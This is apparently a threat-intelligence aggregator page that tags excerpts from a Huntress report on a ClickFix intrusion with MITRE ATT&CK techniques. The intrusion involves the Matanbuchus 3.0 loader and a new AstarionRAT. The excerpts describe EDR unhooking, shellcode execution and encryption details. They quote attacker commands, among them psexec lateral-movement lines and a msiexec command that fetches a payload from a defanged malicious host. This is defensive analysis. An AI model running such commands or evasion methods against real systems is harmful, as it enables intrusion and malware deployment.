TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Huntress

A New RAT and a Hands-on-Keyboard Intrusion

2026-02-16

ATT&CK techniques detected

28 predictions
T1055.001 Dynamic-link Library Injection · 99%
“the loader unhooks both kernel32.dll and ntdll.dll. Many EDR products monitor malicious activity by placing inline hooks on critical API functions - small patches at the start of functions like NtAllocateVirtualMemory that redirect execution to the EDR's own inspection code. …”
T1055.001 Dynamic-link Library Injection · 96%
“…xe - three custom functions the malware author wrote and registered into the interpreter (short for "lua allocate", "lua copy", and "lua execute") to allocate RWX memory, copy the shellcode into it, and jump to it via a raw function pointer call. sysupd doesn’t stand …”
T1055.001 Dynamic-link Library Injection · 95%
“…code … when will it end?! The 151KB of decoded shellcode is a position-independent reflective PE loader. Only the first 3KB is executable code; the remaining ~148KB is payload data containing two embedded stages in a custom binary format. The entry point begins by walking th…”
T1055.001 Dynamic-link Library Injection · 93%
“.0 boasts a new client and panel built from scratch, support for running EXE/DLL/shellcode/MSI payloads both from disk and in memory, reverse shell capabilities via cmd/PS, WQL query execution, high-quality screenshot capture, a morphing engine to maintain clean builds…”
T1055.001 Dynamic-link Library Injection · 91%
“…us 3.0 loader component https://github.com/russianpanda95/yara-rules/blob/main/matanbuchus/win_mal_matanbuchus_loader.yar”
T1053.005 Scheduled Task · 87%
“to the hands-on activity. Things got a bit spicy with AstarionRAT active on the initial endpoint. The operator established persistence via a scheduled task named Application Maintenance, configured to execute core.exe from C:\ProgramData\2895e798a2579e6\. Approximately 1…”
T1055.001 Dynamic-link Library Injection · 84%
“mapped PE's section headers looking for .text, temporarily marks the loaded (hooked) DLL's .text as writable with VirtualProtect (PAGE_EXECUTE_READWRITE), overwrites it with the clean bytes, and restores the original memory protection. After this runs, any inline hook…”
T1055.001 Dynamic-link Library Injection · 77%
“byte of the target buffer is XORed with a rolling key (key[i % key_len]), used to decrypt the import and relocation data before processing. With the data decrypted, the loader applies base relocations, resolves imports by hashing export names from loaded DLLs, and patches t…”
T1204.004 Malicious Copy and Paste · 74%
“A New RAT and a Hands-on-Keyboard Intrusion. Acknowledgments: special thanks to Amelia Casley for her contributions to this investigation. Background: in February 2026, the Huntress Tactical Response team and SOC responded to a hands-on intrusion that began with a ClickFix in…”
T1055.001 Dynamic-link Library Injection · 73%
“, it has been disassembled into individual components and packed into a custom binary stream, a format the shellcode author designed specifically for this loader. The stream contains: - a flag byte (0x02) - four metadata DWORDs: section alignment, entry point RVA, and two loa…”
T1078.003 Local Accounts · 66%
“-d \\<windows_server> C:\ProgramData\UsoShared\rdp.bat - psexec.exe -accepteula -s -d \\<windows_server> C:\ProgramData\UsoShared\rdp1.bat - psexec.exe -accepteula -s -d \\<windows_server> C:\ProgramData\UsoShared\java.exe - psex…”
T1027.016 Junk Code Insertion · 64%
“alongside a malicious jli.dll and an encrypted Lua script named sysupd. When java.exe executes, it naturally loads jli.dll, which is normally the Java Launch Interface library, triggering the malicious code. Embedded Lua interpreter, you say? Junk code obfuscation: every meanin…”
T1573.001 Symmetric Cryptography · 63%
“throughout the chain, then validates the decrypted data for MZ (0x5A4D) and PE (0x4550) signatures. The core function calls RtlDecompressBuffer with LZNT1 compression to decompress the final payload. The decompressed output begins with a 12-byte name field (beacon.exe, nu…”
T1027 Obfuscated Files or Information · 58%
“that the file is exactly 8,624 bytes before proceeding. To decrypt the shellcode, Matanbuchus brute-forces its own ChaCha20 encryption using a known-plaintext check. The 32-byte key is built by converting a numeric counter to an 8-byte ASCII string and appending a 24-b…”
T1027 Obfuscated Files or Information · 56%
“key (32 bytes) and nonce (12 bytes). A separate index array stores [offset, size] pairs that reference individual encrypted strings within the blob. To decrypt a string, the loader reads the offset and size from the index array, slices the corresponding bytes from the encry…”
T1136.001 Local Account · 54%
“-d \\<windows_server> C:\ProgramData\UsoShared\rdp.bat - psexec.exe -accepteula -s -d \\<windows_server> C:\ProgramData\UsoShared\rdp1.bat - psexec.exe -accepteula -s -d \\<windows_server> C:\ProgramData\UsoShared\java.exe - psex…”
T1078.003 Local Accounts · 53%
“A batch script was executed: - C:\ProgramData\UsoShared\rdp.bat. Unfortunately, the contents of the batch scripts were not recoverable. However, based on process telemetry, the script likely automated the creation of a rogue local administrator account. The following comm…”
T1204.001 Malicious Link · 52%
“A New RAT and a Hands-on-Keyboard Intrusion. Acknowledgments: special thanks to Amelia Casley for her contributions to this investigation. Background: in February 2026, the Huntress Tactical Response team and SOC responded to a hands-on intrusion that began with a ClickFix in…”
T1027 Obfuscated Files or Information · 46%
“…remented by 3. Figure 7: the obfuscated "yluwxdodoorf" string is decoded at runtime by subtracting 3 from each byte to resolve "virtualalloc". Loading the encrypted Lua script: the loader locates itself on disk using GetModuleHandleExW with the GET_MODULE_HANDLE_EX_F…”
T1204.002 Malicious File · 46%
“the initial ClickFix prompt to the final AstarionRAT payload, the attack passes through a silent MSI install, Zillya antivirus DLL sideloading, Matanbuchus 3.0 with ChaCha20 encryption, a second DLL sideloading stage via java.exe/jli.dll, an embedded Lua 5.4.7 interpreter,…”
T1059 Command and Scripting Interpreter · 45%
“response as network-byte-order [command_id][size][data] tuples, dispatches each task through the command dispatcher, and sends results back via HTTP POST. On failure, it reconnects and retries after sleeping. Command dispatcher: AstarionRAT supports 24 commands dispa…”
T1078 Valid Accounts · 43%
“-d \\<windows_server> C:\ProgramData\UsoShared\rdp.bat - psexec.exe -accepteula -s -d \\<windows_server> C:\ProgramData\UsoShared\rdp1.bat - psexec.exe -accepteula -s -d \\<windows_server> C:\ProgramData\UsoShared\java.exe - psex…”
T1136.001 Local Account · 41%
“A batch script was executed: - C:\ProgramData\UsoShared\rdp.bat. Unfortunately, the contents of the batch scripts were not recoverable. However, based on process telemetry, the script likely automated the creation of a rogue local administrator account. The following comm…”
T1204.004 Malicious Copy and Paste · 39%
“…s: its obfuscation, communication protocol, and command set. What hasn't been documented until now is what happens after Matanbuchus does its job. In the intrusion we responded to, Matanbuchus delivered a RAT we had never seen before, a fully featured, custom implant we have…”
T1036.005 Match Legitimate Resource Name or Location · 38%
“tmp412.7z with password 4122102026) containing the Zillya sideloading package - core.exe (originally avcore.exe) - legitimate Zillya! Antivirus core engine binary - msvcp120.dll, msvcr120.dll - legitimate Visual C++ runtime DLLs - systemstatus.dll - malicious DLL (Mat…”
T1486 Data Encrypted for Impact · 38%
“commands a significantly higher price - $10,000/month for the HTTPS variant and $15,000/month for a stealthier DNS-based version. That price tag is roughly 3-5x what a typical midmarket loader costs, reflecting its focus on high-value, targeted operations rather tha…”
T1105 Ingress Tool Transfer · 36%
“to issue an HTTPS GET request to the C2 URL to download the main Matanbuchus module. The response from the C2 server is also ChaCha20-encrypted. Per the protocol, if the first 4 bytes of the downloaded payload equal 0xDEADBEEF, the payload is written to disk. The remaining stru…”
T1195.002 Compromise Software Supply Chain · 35%
“legitimate Windows Update paths. Step one: trick the human. The attack starts with a ClickFix prompt instructing the victim to execute the following command: - "C:\Windows\System32\msiexec.exe" -package hxxp:\\binclloudapp[.]com\temp\..\validationid\..\4…”

Summary

ClickFix infection deploys Matanbuchus 3.0 loader and drops a new RAT that we’ve dubbed AstarionRAT. We break down the layers and the hands-on intrusion that followed.